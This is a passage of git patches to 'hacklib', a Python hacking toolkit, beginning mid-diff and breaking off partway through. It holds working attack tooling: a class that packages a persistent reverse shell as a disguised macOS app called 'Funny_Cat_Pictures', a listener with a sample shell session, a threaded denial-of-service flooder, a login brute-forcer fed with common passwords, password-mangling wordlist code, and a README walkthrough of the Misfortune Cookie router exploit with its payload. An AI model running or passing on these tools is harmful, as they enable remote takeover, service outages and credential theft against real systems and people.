("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"), i) - print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$")) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) def LeetNumbers(self): @@ -952,15 +952,15 @@ def LeetNumbers(self): for i in range(self.num1, self.num2): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"), i) - print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$")) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) def UniqueLeet(self): for x in self.text.split(): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"))) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) @@ -1005,7 +1005,6 @@ def ReverseUnique(self): print x[::-1] + x[::-1] - ''' This Classes Dectects Probe Requests from Wireless Devices. From 9d77106d8559a78193f3883581717f886ffe1c7b Mon Sep 17 00:00:00 2001 From: Leon Li Date: Thu, 29 Sep 2016 20:02:01 -0700 Subject: [PATCH 32/40] Update README.md --- README.md | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 35c2f3e..1647184 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,9 @@ Enter the number corresponding to your choice. 1) Connect to a proxy 2) Target an IP or URL 3) Lan Scan -4) Exit +4) Create Backdoor +5) Server +6) Exit ``` Or if you got it using pip: @@ -46,14 +48,21 @@ Reverse shell backdooring (Currently only for Macs): import hacklib bd = hacklib.Backdoor() -# Generates an app that drops a persistent reverse shell into the system. +# Generates an app that, when ran, drops a persistent reverse shell into the system. bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures') # Takes the IP and port of the command server, the OS of the target, and the name of the .app ``` -Listen for connections with netcat: -``` -nc -l 9090 +Listen for connections with Server: +```python +>>> import hacklib +>>> s = hacklib.Server(9091) # Bind server to port 9091 +>>> s.listen() +New connection ('127.0.0.1', 50011) # Prints this when a computer connects +bash: no job control in this shell +bash$ whoami # Type a command +leon +bash$ # Nice! ``` - Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: From b30c56f99cf0734f9c7d0acdc285722c13d72478 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Thu, 29 Sep 2016 22:43:18 -0700 Subject: [PATCH 33/40] Update README.md --- README.md | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 1647184..97d9a96 100644 --- a/README.md +++ b/README.md @@ -52,13 +52,16 @@ bd = hacklib.Backdoor() bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures') # Takes the IP and port of the command server, the OS of the target, and the name of the .app ``` +Generated App: + +![Screenshot](http://i.imgur.com/BsBzCWA.png) Listen for connections with Server: ```python >>> import hacklib ->>> s = hacklib.Server(9091) # Bind server to port 9091 +>>> s = hacklib.Server(9090) # Bind server to port 9090 >>> s.listen() -New connection ('127.0.0.1', 50011) # Prints this when a computer connects +New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds) bash: no job control in this shell bash$ whoami # Type a command leon @@ -120,7 +123,7 @@ Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner: >>> ps = hacklib.PortScanner() >>> ps.scan('192.168.1.1', (80, 81)) Port 80: -HTTP/1.1 404 Not Found +HTTP/1.1 200 Content-Type: text/html Transfer-Encoding: chunked Server: RomPager/4.07 UPnP/1.0 From 4f2e7a9bf333fc57a01ca134c575087630a216bd Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 7 Oct 2016 19:25:16 -0700 Subject: [PATCH 34/40] fix queue in LanScanner an PortScanner --- hacklib.py | 28 ++++++++++++++++++++-------- 1 file changed, 20 insertions(+), 8 deletions(-) diff --git a/hacklib.py b/hacklib.py index 62cb7cc..eaec5df 100644 --- a/hacklib.py +++ b/hacklib.py @@ -118,17 +118,25 @@ def __init__(self, IP, port=21): self.username = '' self.password = '' self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.s.settimeout(3) + self.s.settimeout(5) self.s.connect((self.IP, self.port)) self.s.recv(1024) - def send(self, message): + def _send(self, message): self.s.send(message) - return self.s.recv(2048) + response = self.s.recv(32768) + return response + + def send(self, message): + self.s.send(message + '\r\n') + while True: + response = self.s.recv(32768) + if response: + return response def login(self, username, password): - self.send('USER ' + username + '\r\n') - response = self.send('PASS ' + password + '\r\n') + self._send('USER ' + username + '\r\n') + response = self._send('PASS ' + password + '\r\n') if '230' in response: return elif '331' in response: @@ -269,7 +277,7 @@ def launch(self, host, duration, threads = 1, port = 80, payload = 'default'): self.time_length = duration if payload != 'default': self.payload = payload # Creates queue to hold each thread - self.q = Queue() + self.q = Queue.Queue() #print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.' for i in range(threads): t = threading.Thread(target=self._threader) @@ -352,7 +360,7 @@ def scan(self, IP, port_range = (1, 1025), timeout = 1, verbose = True): self.port_range = port_range self.timeout = 1 # Creates queue to hold each thread - self.q = Queue() + self.q = Queue.Queue() for x in range(30): t = threading.Thread(target=self._threader) t.daemon = True @@ -403,7 +411,7 @@ def scan(self, h_range = (1, 255)): # Adds list of possible local hosts to self.range_range for i in range(h_range[0], h_range[1]): self.host_range.append(stub + '.' + str(i)) - self.q = Queue() + self.q = Queue.Queue() # Launches 100 threads to ping 254 potential hosts for x in range(100): t = threading.Thread(target=self._threader) @@ -521,6 +529,10 @@ def importFromString(code, name): def getIP(host): return socket.gethostbyname(host) +def randomIP(): + import struct + return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) + def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): '''Gets list of recently tested Socks4/5 proxies. Return format is as follows: From 0a2bd67f5b082ed3903646fcf70d231fd6829114 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 7 Oct 2016 19:42:47 -0700 Subject: [PATCH 35/40] Update notice --- README.md | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 97d9a96..60d26b9 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,8 @@ To get hacklib, simply run in command line: ```console pip install hacklib ``` + +- hacklib also has a user interface. To use it, you can do one of the following: Download hacklib.py and run in console: @@ -36,12 +38,7 @@ import hacklib hacklib.userInterface() ``` - -#### Dependencies -Not all classes have external dependencies, but just in case you can do the following: -```python -hacklib.installDependencies() -``` -- + #### Usage Examples Reverse shell backdooring (Currently only for Macs): ```python @@ -233,3 +230,13 @@ Output: ```python [+] Offset: 50 ``` +- +#### Dependencies +Not all classes have external dependencies, but just in case you can do the following: +```python +hacklib.installDependencies() +``` + +- +Note: hacklib is in active development. Expect crucial/major updates frequently. Always update your version of hacklib via pip when you get the chance. + From 7cfb8bbff7bdb7d225a98c7b65f3e9578b81c6e0 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sun, 6 Aug 2017 23:47:39 -0700 Subject: [PATCH 36/40] update typos --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 60d26b9..fd4879e 100644 --- a/README.md +++ b/README.md @@ -109,7 +109,7 @@ ps.scan(getIP('yourwebsite.com')) # After a scan, open ports are saved within ps for reference if ps.portOpen(80): # Establish a TCP stream and sends a message - send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n') + send(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\r\n\r\n') ``` Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner: @@ -128,7 +128,7 @@ EXT: # The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable. # Exploitation ->>> payload = '''GET /HTTP/1.1 +>>> payload = '''GET / HTTP/1.0\r\n Host: 192.168.1.1 User-Agent: googlebot Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8 From ce56bb61e6e6146440581b678a936cd274b1091d Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sun, 6 Aug 2017 23:48:48 -0700 Subject: [PATCH 37/40] increase hacklib.send's recv buffer --- hacklib.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index eaec5df..0917fe1 100644 --- a/hacklib.py +++ b/hacklib.py @@ -596,7 +596,7 @@ def send(IP, port, message, keepalive = False): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((IP, port)) sock.send(message) - response = sock.recv(2048) + response = sock.recv(2400000) if not keepalive: sock.close() return response From 778cc8f2ad32b827334f0add9ceed4011f2fc05e Mon Sep 17 00:00:00 2001 From: Leon Date: Mon, 26 Feb 2018 03:21:41 -0800 Subject: [PATCH 38/40] Update README.md --- README.md | 23 +++++++++-------------- 1 file changed, 9 insertions(+), 14 deletions(-) diff --git a/README.md b/README.md index fd4879e..8059b8d 100644 --- a/README.md +++ b/README.md @@ -4,14 +4,14 @@ ##### Toolkit for hacking enthusiasts using Python. hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development. -- + #### Installation To get hacklib, simply run in command line: ```console pip install hacklib ``` -- + hacklib also has a user interface. To use it, you can do one of the following: Download hacklib.py and run in console: @@ -37,7 +37,7 @@ Or if you got it using pip: import hacklib hacklib.userInterface() ``` -- + #### Usage Examples Reverse shell backdooring (Currently only for Macs): @@ -64,7 +64,7 @@ bash$ whoami # Type a command leon bash$ # Nice! ``` -- + Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: ```python @@ -97,7 +97,7 @@ for p in passwords: print 'Password is', p break ``` -- + Port Scanning: ```python from hacklib import * @@ -139,7 +139,7 @@ Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n' # The cookie replaced the firmware's memory allocation for web authentication with a null bye. # The router's admin page is now fully accessible from any web browser. ``` -- + FTP authentication: ```python import hacklib @@ -149,7 +149,7 @@ try: except: print 'Login failed.' ``` -- + Socks4/5 proxy scraping and tunneling ```python >>> import hacklib @@ -171,7 +171,7 @@ u'KE' # To filter proxies by country and type: # proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5') ``` -- + Word Mangling: ```python @@ -198,7 +198,6 @@ Test1990 Test2016 2016Test ``` -- Pattern Create: @@ -214,7 +213,6 @@ Output: ``` Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A ``` -- Pattern Offset: @@ -230,13 +228,10 @@ Output: ```python [+] Offset: 50 ``` -- + #### Dependencies Not all classes have external dependencies, but just in case you can do the following: ```python hacklib.installDependencies() ``` -- -Note: hacklib is in active development. Expect crucial/major updates frequently. Always update your version of hacklib via pip when you get the chance. - From 18e6c48d0e68d27607544ef0cd8879877a66b73d Mon Sep 17 00:00:00 2001 From: Leon Date: Mon, 26 Feb 2018 03:53:47 -0800 Subject: [PATCH 39/40] autopep8 --- hacklib.py | 257 ++++++++++++++++++++++++++++++++--------------------- 1 file changed, 156 insertions(+), 101 deletions(-) diff --git a/hacklib.py b/hacklib.py index 0917fe1..21c7269 100644 --- a/hacklib.py +++ b/hacklib.py @@ -18,14 +18,20 @@ CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' -import socket, httplib, threading, time, urllib2, os +import socket +import threading +import time +import urllib2 +import os from Queue import Queue -try: # Import scapy if they have it. If they don't, they can still use hacklib +try: # Import scapy if they have it. If they don't, they can still use hacklib from scapy.all import * import logging - logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error -except: pass -from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset + logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error +except: + pass +from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset + class Backdoor(object): '''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX. @@ -62,14 +68,15 @@ def __init__(self): exit ''' - def create(self, IP, port, OS, appname = 'funny_cats'): + def create(self, IP, port, OS, appname='funny_cats'): '''Creates a user-level reverse shell.''' - + if OS == 'OSX': self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port)) try: os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS') - except: pass + except: + pass payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname with open(payload_path, 'w') as f: f.write(self.osx_payload) @@ -77,6 +84,7 @@ def create(self, IP, port, OS, appname = 'funny_cats'): subprocess.Popen(['chmod', '755', payload_path]) print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app' + class Server(object): def __init__(self, port): @@ -104,7 +112,8 @@ def listen(self): time.sleep(0.5) finally: connection.close() - + + class FTPAuth(object): '''FTP login and command handler. Commands: @@ -143,7 +152,8 @@ def login(self, username, password): return 'Password required' else: raise Exception(response) - + + class AuthClient(object): '''Universal login tool for most login pages as well as HTTP Basic Authentication. Commands: @@ -165,7 +175,7 @@ def _get_login_type(self): return 'BA' if 'timed out' in str(e).lower(): return 'TO' - + def _login_mechanize(self): try: import mechanize @@ -186,17 +196,21 @@ def _login_mechanize(self): password_control = '' # Locates username and password input, and submits login info for control in br.form.controls: - if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields: username_control = control - if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: password_control = control + if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields: + username_control = control + if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: + password_control = control username_control.value = self.username - try: password_control.value = self.password + try: + password_control.value = self.password except: # Detected a username input but not a password input. # Submits form with username and attempts to detect password input in resulting page response = br.submit() br.form = list(br.forms())[0] for control in br.form.controls: - if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: password_control = control + if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields: + password_control = control password_control.value = self.password response = br.submit() # Returns response if the URL is changed. Assumes login failure if URL is the same @@ -220,7 +234,7 @@ def _login_BA(self): except Exception, e: if 'Error 401' in str(e): raise Exception('Login credentials incorrect.') - + def login(self, url, username, password): self.url = url self.username = username @@ -229,12 +243,13 @@ def login(self, url, username, password): logintype = self. _get_login_type() if logintype == 'BA': # attempts to login with BA method and return html - return self._login_BA() + return self._login_BA() if logintype == 'TO': raise Exception('Request timed out.') if logintype == 'FORM': return self._login_mechanize() + class DOSer(object): '''Hits a host with GET requests on default port 80 from multiple threads. Commands: @@ -250,16 +265,17 @@ def __init__(self): self.start_time = 0 self.time_length = 1 - def _attack(self, target): + def _attack(self, target): # Sends GET requests for time_length duration while int(time.time()) < self.start_time + self.time_length: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) try: s.connect((self.target, self.port)) - s.send("GET /" + self.payload + " HTTP/1.1\r\n") - s.send("Host: " + self.target + "\r\n\r\n") - except: pass + s.send("GET /" + self.payload + " HTTP/1.1\r\n") + s.send("Host: " + self.target + "\r\n\r\n") + except: + pass def _threader(self): while True: @@ -267,7 +283,7 @@ def _threader(self): self._attack(self.worker) self.q.task_done() - def launch(self, host, duration, threads = 1, port = 80, payload = 'default'): + def launch(self, host, duration, threads=1, port=80, payload='default'): '''Launches threaded GET requests for (duration) seconds. ''' self.target = host @@ -275,7 +291,8 @@ def launch(self, host, duration, threads = 1, port = 80, payload = 'default'): self.threads = threads self.start_time = int(time.time()) self.time_length = duration - if payload != 'default': self.payload = payload + if payload != 'default': + self.payload = payload # Creates queue to hold each thread self.q = Queue.Queue() #print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.' @@ -290,6 +307,7 @@ def launch(self, host, duration, threads = 1, port = 80, payload = 'default'): self.q.join() return + class PortScanner(object): '''Scan an IP address using scan(host) with default port range 1-1024. Commands: @@ -309,7 +327,7 @@ def _portscan(self, port): s.settimeout(self.timeout) # Tries to establish a connection to port, and append to list of open ports try: - con = s.connect((self.IP,port)) + con = s.connect((self.IP, port)) response = s.recv(1024) self.openlist.append(port) if self.verbose: @@ -338,21 +356,22 @@ def _portscan(self, port): print 'Port', str(port) + ':' print response s.close() - except: pass - + except: + pass + def portOpen(self, port): if port in self.openlist: return else: return False - + def _threader(self): while True: self.worker = self.q.get() self._portscan(self.worker) self.q.task_done() - def scan(self, IP, port_range = (1, 1025), timeout = 1, verbose = True): + def scan(self, IP, port_range=(1, 1025), timeout=1, verbose=True): '''Scans ports of an IP address. Use getIP() to find IP address of host. ''' self.openlist = [] @@ -371,6 +390,7 @@ def scan(self, IP, port_range = (1, 1025), timeout = 1, verbose = True): self.q.join() + class LanScanner(object): '''Scans local devices on your LAN network. Commands: @@ -393,7 +413,8 @@ def _scan(self, host): try: resp = subprocess.check_output(['ping', '-c1', '-W90', host]) self.alive_hosts.append(host) - except: return + except: + return def getLocalIP(self): import subprocess @@ -403,8 +424,8 @@ def getLocalIP(self): for line in data: if 'inet ' in line and '127.' not in line: return line.split(' ')[1] - - def scan(self, h_range = (1, 255)): + + def scan(self, h_range=(1, 255)): # Finds local IP first in order to determine IP range of local network localip = self.getLocalIP() stub = '.'.join(localip.split('.')[:-1]) @@ -421,10 +442,12 @@ def scan(self, h_range = (1, 255)): self.q.put(worker) self.q.join() return list(set(self.alive_hosts)) - + + class _Getch: """Gets a single character from standard input. Does not echo to the screen.""" + def __init__(self): try: self.impl = _GetchWindows() @@ -439,10 +462,14 @@ def __call__(self): return self.impl() class _GetchUnix: def __init__(self): - import tty, sys, termios + import tty + import sys + import termios def __call__(self): - import sys, tty, termios + import sys + import tty + import termios try: fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) @@ -452,7 +479,9 @@ def __call__(self): finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch - except: return raw_input('> ') + except: + return raw_input('> ') + class _GetchWindows: def __init__(self): @@ -462,7 +491,9 @@ def __call__(self): try: import msvcrt return msvcrt.getch() - except: return raw_input('> ') + except: + return raw_input('> ') + class Proxy(object): '''Can work in conjunction with getProxies() to tunnel all @@ -471,7 +502,7 @@ class Proxy(object): connect() Args: getProxies(), timeout=10 connect_manual() Args: IP, port, proxy_type ''' - + def __init__(self): self.IP = '' self.port = '' @@ -493,12 +524,13 @@ def connect(self, proxies, timeout=10): socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1])) socket.socket = socks.socksocket # Tests to see if the proxy can open a webpage - currentIP = urllib2.urlopen('http://icanhazip.com/', timeout = timeout).read().split()[0] + currentIP = urllib2.urlopen('http://icanhazip.com/', timeout=timeout).read().split()[0] self.IP = proxy[0] self.port = int(proxy[1]) self.country = proxy[2] return - except: pass + except: + pass raise Exception('Couldn\'t connect to any proxies.') def connect_manual(IP, port, proxy_type='Socks5'): @@ -513,7 +545,8 @@ def connect_manual(IP, port, proxy_type='Socks5'): self.IP = IP self.port = port return currentIP - except: raise Exception('Connection failed.') + except: + raise Exception('Connection failed.') def importFromString(code, name): @@ -521,29 +554,37 @@ def importFromString(code, name): Args: code: a string, a file handle, or a compiled binary name: the name of the module """ - import sys, imp + import sys + import imp module = imp.new_module(name) exec code in module.__dict__ return module + def getIP(host): return socket.gethostbyname(host) + def randomIP(): import struct return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) -def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): + +def getProxies(country_filter='ALL', proxy_type=('Socks4', 'Socks5')): '''Gets list of recently tested Socks4/5 proxies. Return format is as follows: [IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked] Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX') proxy_type: Specify whic Socks version to use, e.g. 'Socks5' ''' - try: import mechanize - except: raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()') - try: from bs4 import BeautifulSoup - except: raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()') + try: + import mechanize + except: + raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()') + try: + from bs4 import BeautifulSoup + except: + raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()') br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'googlebot')] @@ -570,23 +611,32 @@ def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): if proxy[4] in proxy_type and proxy[2] in country_filter: filteredlist.append(proxy) else: - if proxy[4] in proxy_type: filteredlist.append(proxy) + if proxy[4] in proxy_type: + filteredlist.append(proxy) proxylist = filteredlist return proxylist + def installDependencies(): import subprocess mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize']) - if 'successfully installed' in mech: print 'Installed mechanize' + if 'successfully installed' in mech: + print 'Installed mechanize' beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4']) - if 'successfully installed' in beaut: print 'Installed beautifulsoup' + if 'successfully installed' in beaut: + print 'Installed beautifulsoup' scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy']) - if 'successfully installed' in scapy: print 'Installed scapy' + if 'successfully installed' in scapy: + print 'Installed scapy' pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy']) - if 'successfully installed' in pcapy: print 'Installed pcapy' + if 'successfully installed' in pcapy: + print 'Installed pcapy' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -def send(IP, port, message, keepalive = False): + + +def send(IP, port, message, keepalive=False): '''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock to handle socket and hacklib.sock.close() when finished. ''' @@ -596,18 +646,21 @@ def send(IP, port, message, keepalive = False): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((IP, port)) sock.send(message) - response = sock.recv(2400000) + response = sock.recv(2048) if not keepalive: sock.close() return response + def ping(host): """Pings a host and returns true if the host exists. """ - import os, platform - ping_str = "-n 1" if platform.system().lower()=="windows" else "-c 1" + import os + import platform + ping_str = "-n 1" if platform.system().lower() == "windows" else "-c 1" return os.system("ping " + ping_str + " " + host) == 0 + def topPasswords(amount): '''Get up to 100,000 most common passwords. ''' @@ -615,6 +668,7 @@ def topPasswords(amount): passlist = urllib2.urlopen(url).read().split('\n') return passlist[:amount] + def uiPortScan(address): print '' print '1) default scan (port range 1-1024)' @@ -631,6 +685,7 @@ def uiPortScan(address): ps.scan(address, (int(s_port), int(e_port))) print 'Port scan complete.' + def uiDOS(address): dos = DOSer() print '' @@ -641,12 +696,14 @@ def uiDOS(address): print 'Launching DOS attack' dos.launch(address, duration, threads, port, payload) + def uiTCPMessage(address): print '' port = int(raw_input('Input port >')) message = raw_input('Message > ') send(address, port, message) + def uiLogin(address): print '' print 'Select login type' @@ -722,7 +779,7 @@ def uiLogin(address): except: print password + ' failed.' ftp = FTPAuth(address) - + if cmd == '2': username = raw_input('Username > ') ftp.send('USER ' + username + '\r\n') @@ -731,6 +788,7 @@ def uiLogin(address): if cmd == '3': return + def uiLanScan(): lan = LanScanner() print 'Starting Lan scan' @@ -740,6 +798,7 @@ def uiLanScan(): print 'Lan scan complete.' time.sleep(2) + def uiCreateBackdoor(): print '' print 'Select OS' @@ -754,13 +813,15 @@ def uiCreateBackdoor(): bd.create(ip, port, 'OSX', appname) time.sleep(2) + def uiServer(): print '' port = raw_input('Listening port > ') s = Server(int(port)) print 'Listening on port ' + port s.listen() - + + def userInterface(): '''Start UI if hacklib isn't being used as a library. ''' @@ -796,10 +857,14 @@ def userInterface(): print '4) Attempt login' print '5) Exit' cmd = ink() - if cmd == '1': uiPortScan(getIP(address)) - if cmd == '2': uiDOS(getIP(address)) - if cmd == '3': uiTCPMessage(getIP(address)) - if cmd == '4': uiLogin(address) + if cmd == '1': + uiPortScan(getIP(address)) + if cmd == '2': + uiDOS(getIP(address)) + if cmd == '3': + uiTCPMessage(getIP(address)) + if cmd == '4': + uiLogin(address) cmd = '' if cmd == '3': @@ -810,7 +875,7 @@ def userInterface(): if cmd == '5': uiServer() - + if cmd == '1': print 'Would you like to automatically find a proxy or input one manually?' print 'Enter the number corresponding to your choice.' @@ -832,11 +897,17 @@ def userInterface(): pr_address = raw_input('Proxy address > ') pr_port = raw_input('Proxy port > ') pr_type = raw_input('Enter "Socks4" or "Socks5" > ') - try: proxy.connect_manual(pr_address, pr_port, pr_type) - except: print 'Connection failed.'; time.sleep(2); pass + try: + proxy.connect_manual(pr_address, pr_port, pr_type) + except: + print 'Connection failed.' + time.sleep(2) + pass print 'Proxy connected.' time.sleep(2) pass + + """ This Class Mangles Words specified by the user @@ -851,6 +922,7 @@ def userInterface(): """ + class Mangle: def __init__(self, text, num1, num2, year1, year2): @@ -861,13 +933,12 @@ def __init__(self, text, num1, num2, year1, year2): self.year2 = year2 self.text = text - def Numbers(self): for x in self.text.split(): for i in range(self.num1, self.num2): - + print ("%s" + "%s") % (x, i) print ("%s" + "%s") % (i, x) @@ -876,36 +947,32 @@ def Years(self): for x in self.text.split(): for i in range(self.year1, self.year2): - + print ("%s" + "%s") % (x, i) print ("%s" + "%s") % (i, x) - def UniqueNum(self): - + for x in self.text.split(): - + for i in range(self.num1, self.num2): print ("%s" + "%s" + "%s") % (x, x, i) - def UniqueYears(self): for x in self.text.split(): - + for i in range(self.year1, self.year2): print ("%s" + "%s" + "%s") % (x, x, i) - - def FirstLetterCapNum(self): for x in self.text.split(): for i in range(self.num1, self.num2): - + print ("%s" + "%s") % (x.capitalize(), i) print ("%s" + "%s") % (i, x.capitalize()) @@ -915,39 +982,31 @@ def Caps(self): print x.capitalize() - def UniqueCaps(self): for x in self.text.split(): print ("%s" + "s") % (x.capitalize(), x.capitalize()) - - def CapandYears(self): for x in self.text.split(): for i in range(self.year1, self.year2): - + print ("%s" + "%s") % (x.capitalize(), i) print ("%s" + "%s") % (i, x.capitalize()) - - + def Leet(self): for x in self.text.split(): print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") - - def LeetCap(self): for x in self.text.split(): print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") - - def LeetYears(self): for x in self.text.split(): @@ -957,7 +1016,6 @@ def LeetYears(self): print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) - def LeetNumbers(self): for x in self.text.split(): @@ -967,14 +1025,11 @@ def LeetNumbers(self): print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", 